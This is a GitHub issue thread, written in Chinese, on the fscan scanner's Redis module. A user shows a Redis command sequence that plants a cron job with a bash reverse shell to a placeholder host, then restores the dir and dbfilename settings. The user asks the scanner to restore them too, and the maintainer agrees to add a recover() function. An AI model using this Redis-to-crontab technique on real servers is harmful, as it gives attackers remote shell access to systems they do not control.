### ISSUE TITLE
关于redis扫描

### ISSUE THREAD

**Issue by lnm3000** [shadow1ng/fscan#22]
redis> CONFIG GET dir
dir
/var/lib/redis
redis> CONFIG GET dbfilename
dbfilename
dump.rdb
redis> set x "\n* * * * * bash -i >& /dev/tcp/x.x.x.x/9999 0>&1\n"
OK
redis> config set dir /var/spool/cron/
OK
redis> config set dbfilename root
OK
redis> save //保存配置，写入crontab反弹shell
OK
redis> config set dir /var/lib/redis //恢复redis配置文件
OK
redis> config set dbfilename dump.rdb //恢复redis配置文件
OK

可以看懂？扫描器直接改了dir和dbfinlename而不给改回去，这个点建议改良一下～

**Comment by shadow1ng** [comment]
噢噢，有道理，那得加个recover()函数比较安全一些
